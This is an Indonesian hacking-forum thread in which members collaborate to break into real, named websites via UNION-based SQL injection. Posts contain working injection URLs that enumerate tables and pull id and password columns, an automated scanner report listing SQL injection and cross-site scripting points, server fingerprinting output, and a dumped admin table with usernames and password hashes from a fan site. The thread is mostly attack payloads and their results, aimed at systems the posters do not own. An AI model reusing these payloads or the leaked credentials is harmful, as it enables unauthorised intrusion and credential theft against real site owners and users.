maap masih nyoba2,, kalau ada kesalahan saya mohon koreksi dari suhu2 sekalian :kaca:http://www.essaygifts.co.za/catalogue-list.php?id=2 UNION SELECT 1,table_name,3,4,5,6 FROM information_schema.tables--
ada yang mau nerusin [SQL Injection]
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
-
adit_coolz
- Posts: 13
- Joined: Sun Aug 26, 2007 6:59 pm
- Location: pAradIse
ada yang mau nerusin [SQL Injection]
silahkan menuju TKP
Re: ada yang mau nerusin [SQL Injection]
Code: Select all
http://www.essaygifts.co.za/catalogue-list.php?id=2+UNION+SELECT+1,column_name,3,4,5,6+FROM+information_schema.columns+where+table_name=0x6163636573732d636f6e74726f6c2d7573657273--
Re: ada yang mau nerusin [SQL Injection]
Ga bisa maenan sql, cuma duduk nyimak sambil gelar tikar.. liat para master beraksi
Code: Select all
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><style>table{table-layout:fixed;overflow:hidden;}</style><title>
Scan Report
</title>
</head><body>
<center>
<br><br><br><br><br><br><br><br><h1>
Xcode Scan Report<br>
</h1><br><br><br><br><br><br><br><br>Made By Sinichi<br><br><br><br><br><br><br><br>Created By Xcode - Web Vulnerability Scanner<br>2010-01-31<div style="page-break-after:always"> </div><h2>
Vulnerability Result
</h2><table border="1" width="640" cellspacing="0" bordercolordark="009099">
<tr><td>URL</td><td>Type</td><td>KeyWord</td><td>Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/catalogue-list.php?id=-2+UNION+SELECT+1,GROUP_CONCAT(column_NAME),3,4,5,6 FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x6163636573732d636f6e74726f6c2d7573657273--</td><td>GET</td><td>http://www.essaygifts.co.za/catalogue-list.php?id=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(URL)</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>Integer</td><td>upload</td><td>SQL Injection Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>GET</td><td>http://www.essaygifts.co.za/product-list.php?id=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(URL)</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>POST</td><td>http://www.essaygifts.co.za/product-list.php|search=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(Form)</td></tr><tr><td>http://www.essaygifts.co.za/product.php?id=55</td><td>Integer</td><td>html</td><td>SQL Injection Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/product.php?id=55</td><td>GET</td><td>http://www.essaygifts.co.za/product.php?id=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(URL)</td></tr><tr><td></td></tr>
</table><br>
</center>
</body>
</html>Just Newbie
Re: ada yang mau nerusin [SQL Injection]
ayo semangat.. search di forum trus praktek di site itu.. wkwkwkwk..
-
adit_coolz
- Posts: 13
- Joined: Sun Aug 26, 2007 6:59 pm
- Location: pAradIse
Re: ada yang mau nerusin [SQL Injection]
ampyun dah,, :circle:
gagal lagi gagal lagi :putusasa:
gagal lagi gagal lagi :putusasa:
-
adit_coolz
- Posts: 13
- Joined: Sun Aug 26, 2007 6:59 pm
- Location: pAradIse
Re: ada yang mau nerusin [SQL Injection]
Code: Select all
http://www.essaygifts.co.za/catalogue-list.php?id=2+UNION+ALL+SELECT+1,GROUP_CONCAT(id,0x3a,password),3,4,5,6+FROM+0x6163636573732d636f6e74726f6c2d7573657273--
Code: Select all
http://www.essaygifts.co.za/catalogue-list.php?id=-2+UNION%20SELECT+1,GROUP_CONCAT%28id,0x3a,password%29,3,4,5,6+FROM+access-control-user--
:pusing:
Re: ada yang mau nerusin [SQL Injection]
hmmmadit_coolz wrote:silahkan menuju TKP
maap masih nyoba2,, kalau ada kesalahan saya mohon koreksi dari suhu2 sekalian :kaca:http://www.essaygifts.co.za/catalogue-list.php?id=2 UNION SELECT 1,table_name,3,4,5,6 FROM information_schema.tables--
Server = Apache/1.3.34 (Debian) mod_auth_pam/1.1.1 mod_gzip/1.3.26.1a mod_perl/1.29 mod_fastcgi/2.4.2 AuthMySQL/4.3.9-2 mod_ssl/2.8.25 OpenSSL/0.9.8c
Version = 5.0.32-Debian_7etch11
Powered by = PHP/5.2.0-8+etch16
Attack Type = SQL Union Injection
Current User = [email protected]
Current Database = essayh_db1
Supports Union = yes
Union Columns = 6
Tak akan Pernah ada manusia yang Sempurna
-
adit_coolz
- Posts: 13
- Joined: Sun Aug 26, 2007 6:59 pm
- Location: pAradIse
Re: ada yang mau nerusin [SQL Injection]
bingung yang atas.. nyari lagi.. ehh dapet inih...
+] URL:http://www.juventus.co.id/pages.php?id_ ... de,3,4,5--
[+] Evasion Used: "+" "--"
[+] 00:41:18
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: juvewebdb
User: juveweb@localhost
Version: 5.0.51b-community-nt
[+] Dumping data from database "juvewebdb" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 3
[0] dana:dana:
[1] Mazh
[2] admin:25c2202579eb40e66c5017012db9ee62:25c2202579eb40e66c5017012db9ee62:
:kaca: :love:
+] URL:http://www.juventus.co.id/pages.php?id_ ... de,3,4,5--
[+] Evasion Used: "+" "--"
[+] 00:41:18
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: juvewebdb
User: juveweb@localhost
Version: 5.0.51b-community-nt
[+] Dumping data from database "juvewebdb" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 3
[0] dana:dana:
[1] Mazh
[2] admin:25c2202579eb40e66c5017012db9ee62:25c2202579eb40e66c5017012db9ee62:
:kaca: :love:
